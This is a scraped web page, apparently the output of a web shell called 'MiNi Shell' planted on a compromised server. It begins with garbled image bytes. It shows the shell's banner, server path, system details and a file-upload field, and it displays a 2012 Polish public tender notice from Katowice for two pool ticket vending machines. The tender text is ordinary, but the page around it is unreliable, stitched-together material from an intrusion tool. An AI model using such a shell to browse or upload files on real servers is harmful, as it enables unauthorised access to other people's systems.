JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120705/237392-N-2012.html

<p class="kh_header"><b>Katowice: Dostawa i montaż automatów do sprzedaży biletów wstępu na basen</b><br>
<b>Numer ogłoszenia: 237392 - 2012; data zamieszczenia: 05.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , Aleja Korfantego 35, 40-005 Katowice, woj. śląskie, tel. 32 258 53 55, 253 87 33, faks 32 253 87 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.katowice.pl/jednostki/mosir/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa miasta Katowice nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż automatów do sprzedaży biletów wstępu na basen.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi (z uwzględnieniem postanowień art. 30 Ustawy) dostawa i montaż automatów do sprzedaży biletów wstępu na basen  

Zakres zamówienia obejmuje :
1.	Dostawę, montaż i uruchomienie dwóch fabrycznie nowych stacjonarnych automatów do sprzedaży biletów wstępu na basen ORW Bugla w Katowicach przy ul. Żeliwnej 26 D oraz dostawę materiałów eksploatacyjnych tj. 40 rolek do wydruku biletów i raportów.
2.	Wykonanie trwałego betonowego fundamentu dla automatów wraz z wyprowadzeniem okablowania zasilającego i sieci LAN.
3.	Serwis, naprawy, usuwanie awarii i przeglądy techniczne w okresie gwarancyjnym.
4.	Szkolenie pracowników Zamawiającego w obsłudze i konserwacji zamontowanych automatów.

Stacjonarny - samoobsługowy automat do sprzedaży papierowych biletów wejściowych na basen współpracujący z systemem obsługi klienta BxEsok. 

Obudowa 
Automat  zbudowany z nierdzewnej blachy stalowej. Automat zabezpieczony  przed próbą otwarcia blokadą z kilkustopniowym ryglowaniem (min. 3) zabezpieczoną min. 2 zamkami zamykającymi. Dostęp do elementów składowych automatu (pojemniki na monety, kasety końcowe na bilon i na monety, dodatkowe pojemniki - zabezpieczone odrębnymi zamkami - uniemożliwiającymi ich dowolne wyciąganie.  W drzwiach frontowych automatu  znajdują się: otwór na monety, otwór na banknoty, interfejs użytkownika oraz rynienka na bilety, paragony i resztę. Przesłony otworów obsługowych zabezpieczone przed uszkodzeniem.

Interfejs użytkownika 
Interfejs użytkownika automatu tworzy kolorowy ekran LCD TFT 15.1 (orientacja pozioma, rozdzielczość: 1024 x 768 punktów) oraz odpowiedni panel dotykowy wyposażony w czujniki pojemnościowe. Nakładka dotykowa grubości min. 6mm, zabezpieczająca wyświetlacz przed wandalizmem. Wykonanie w technologii IR Touch - czujników podczerwonych. 

System obsługi monet 
System obsługi monet automatu jest złożony z następujących podzespołów: 

Otwór na monety 
System monet wyposażony w mechaniczną klapkę zabezpieczającą wlot monet, zamykającą otwór pomiędzy poszczególnymi transakcjami. Szczelina otwiera się automatycznie przy transakcjach  gotówkowych. Wlot monet zaopatrzony w szczelinową fotokomórkę - pozwalającą na wykrycie prób zatkania toru przebiegu monet. Zabudowany osobny kanał, do którego kierowane są monety i elementy niezaakceptowane. 

Moduł akceptacji monet 
Weryfikacja monet bazuje na ich średnicy, grubości, wadze i zawartości metalu. Ustawienia, na podstawie których dokonuje się porównań, są określane przez stację programującą czytnik monet i bazują na specyfikacjach monet. Informacje te są przechowywane wewnętrznie. W przypadku konieczności przeprogramowania - obsługa serwisu producenta może wprowadzić zmiany przy pomocy stacji programującej. Czytnik monet umożliwiający łatwe i proste przejście na monety Euro.

Moduł wydawania reszty 
6 recyrkulacyjnych (samo napełniających) pojemników na monety. System obsługi monet akceptuje monety o wartości:  1 zł.; 2 zł.; 5zł. Możliwość indywidualnej konfiguracji monet akceptowanych w konkretnym automacie. Ilość monet w każdym pojemniku - min. 60 sztuk. Wydawanie reszty w dowolnej konfiguracji. 

Pojemnik końcowy na monety- kaseta końcowa 
- Objętość ok. 5 dm3
- Kaseta może być instalowana tylko w jednym kierunku 
- Kaseta po odryglowaniu kluczem jest automatycznie zamykana - możliwość jej otwarcia jest dopiero po odryglowaniu zamka zabezpieczającego (kaseta z 2 patentowymi zamkami)

Min. 2 dodatkowe kasety na monety (hoppery) 

Automat ma być wyposażony w dodatkowe kasety na monety (zwane hopperami) służące do wydawania reszty w przypadku gdy w module wydawania reszty zabraknie bilonu, o nominalnej pojemności min. 400 monet każdy (dużej średnicy).

System obsługi banknotów 
Składa się z modułu akceptacji banknotów wraz ze zintegrowanym depozytem oraz  pojemnikiem końcowym. Banknoty podlegające weryfikacji są zdefiniowane na odpowiedniej liście wariantów. Czytnik zabudowany w automacie skonfigurowany w sposób by akceptować  następujące banknoty: 10 zł, 20 zł, możliwość skonfigurowania obsługi dla wyższych nominałów. 
Możliwość stworzenia progów akceptacji banknotów, np. dla płatności o wyższej wartości przyjmowanie banknotów o wyższym nominale - możliwość dowolnego konfigurowania progów akceptacji. 
Automat musi akceptować płatności więcej niż jednym banknotem podczas pojedynczej transakcji w przypadku zakupu za wyższą kwotę. W przypadku gdy w automacie nie będzie znajdowała się odpowiednia ilość bilonu w tubach lub hopperach niezbędna dla wydawania reszty automat może nie akceptować płatności banknotami.

Moduł akceptacji banknotów 
Moduł akceptacji banknotów wykorzystuje czujniki optyczne w celu weryfikacji wprowadzanych banknotów. Parametry akceptacji bazują na specyfikacjach banknotów złotówkowych. Banknoty, które nie zostały zaakceptowane, będą zwracane klientom. Moduł akceptacji banknotów ma posiadać następujące cechy dodatkowe: 

- kolorowa dioda LED sygnalizująca gotowość do przyjmowania banknotów 
- moduł odrzuca fałszywe banknoty 
- akceptacja 4-kierunkowa 
- moduł ma przyjąć co najmniej 95% banknotów przy pierwszej i 97% przy drugiej próbie (włącznie z banknotami zaakceptowanymi przy pierwszej próbie). Dotyczy to banknotów w odpowiednim stanie. 
Depozyt banknotów 

Moduł depozytu, połączony z modułem akceptacji banknotów, może przechowywać 1 banknot. 

Kaseta końcowa na banknoty 

Banknoty są automatycznie układane w komorze. W kasecie końcowej ma pomieścić się min. 1000 banknotów. 

Drukarki 
Automat ma być wyposażony w dwie drukarki umożliwiające: 
- wydruk biletu papierowego na specjalnie przygotowanym papierze. Każdy wydrukowany bilet ma swój unikalny numer oraz kod kreskowy identyfikujący w systemie obsługi klienta BxEsok
- wygląd wydruku - jest konfigurowalny przez użytkownika i możliwy do zmiany 
- drukarka posiada czujniki stanu papieru, które sygnalizują zbliżające się stany alarmowe  i włączenie drugiej drukarki 

Dodatkowe parametry drukarki: 
- punkty/wiersz - ekwiwalent min. 93 dpi 
- Szerokość wydruku: do 74 mm 
- Szerokość papieru: 30-80 mm (możliwość regulacji) 
- Prędkość drukowania: min. 100mm/s 
- Prędkość cięcia: min. 250ms
- Trwałość ostrza: min. 1.000.000 cięć papieru 120 g/m2 
- Urządzenie ostrzące o szerokości 80 mm. 
- Można stosować papier 80 - 180 g/m2 (> 120 g/m2 w przypadku papieru o szerokości< 55mm) 
- Długość biletu: 30 mm do 152 mm 
- Średnica zewnętrzna rolki biletów: maks. 200 mm 
System komputerowy 
Jednostka sterująca oparta na przemysłowym komputerze o strukturze zgodnej z IBM pracującym pod kontrolą systemu operacyjnego Windows XP, 7 Embeded. Aplikacja sterująca zarządza funkcjami automatu, włącznie z pobieraniem, przechowywaniem i transmisją danych do systemu obsługi klienta BxEsok. Dane zapisywane są w 2 lokacjach na dysku twardym, możliwość zastosowania pomocniczej lokalizacji w postaci karty pamięci typu flash.

Parametry jednostki sterującej: 
- Intel ATOM 1,6 GHz (lub kompatybilny) 
- min. 2 GB RAM 
- Dysk twardy typu SSD -SATA 40 GB lub więcej 
- Porty V11 
- Port klawiatury 
- Sterownik portu Multi I/O RS232 
- Sterownik VGA 1,024 X 768 
- adapter Ethernet (RJ45) 
- Wejście Multidrive do kart typu flash 

Aplikacja sterująca
Aplikacja umożliwi prezentację informacji i komunikatów o treści i formie przygotowanej przez Zamawiającego.
Możliwości aplikacji sterującej: 
- wydruk i sprzedaż papierowych biletów jednorazowych według cennika: bilet ulgowy, bilet normalny, bilet normalny po godzinie 15, możliwość wprowadzenia nowych taryf,
- współpraca z systemem obsługi klienta BxEsok na poziomie bazy danych - (zapytanie o numer biletu, zapis wydania biletu do bazy, kontrola wydania biletu przez automat, skasowanie biletu po przejściu przez kołowroty wejściowe, statystyki ilości wydanych biletów z poziomu systemu esok) 
- zapis wszystkich danych (transakcje, operacje na kartach) w pamięci automatu 
- tworzenie wielu statystyk (sprzedaży - bieżąca, miesięczna ; awarii; pracy, listy transakcji) 

Montaż na trwałym betonowym fundamencie z wyprowadzenie okablowania zasilającego i sieci LAN

Wraz z dostawą należy dostarczyć:
- szczegółową instrukcję obsługi automatów w języku polskim,
- karty gwarancyjne automatów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.93.30.00-5, 45.31.10.00-0, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. Ocena spełniania warunków odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. Ocena spełniania warunków odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. Ocena spełniania warunków odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. Ocena spełniania warunków odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 18.2 SIWZ. Ocena spełniania warunków odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym  załącznik  do SIWZ.
2.	Oświadczenie Wykonawcy, o treści określonej w art. 22 ust. 1 - że Wykonawca może ubiegać się o udzielenie zamówienia, wg wzoru stanowiącego załącznik  do SIWZ.
Oferty wspólne:
1.	W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. 
2.	Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
3.	Zamawiający przy ocenie spełnienia warunków będzie rozpatrywał podane informacje łącznie 
z zastrzeżeniem, że dokumenty wymienione w punkcie 18 ppkt 3 litery a-d  muszą przedstawić dla każdego z partnerów Konsorcjum lub wspólników spółki osobno.
4.	Dokumenty załączone do oferty winne być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza możliwość wprowadzenia zmian do zawartej umowy w przypadku: 
	- zaistnienia nadzwyczajnej okoliczności której nie można było przewidzieć  w chwili zawarcia umowy wynikającej z potrzeby zmiany np. koncepcji realizacji inwestycji, 	dokumentacji projektowej, a zmiana ta jest korzystna dla zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl/jednostki/mosir/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, Al. Korfantego 35, 40-003 Katowice, pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2012 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, Al. Korfantego 35, 40-003 Katowice, pokój nr 8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com